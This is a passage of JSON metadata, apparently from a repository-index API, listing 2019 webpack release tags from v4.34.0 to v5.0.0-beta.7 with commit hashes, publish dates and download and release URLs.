ies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05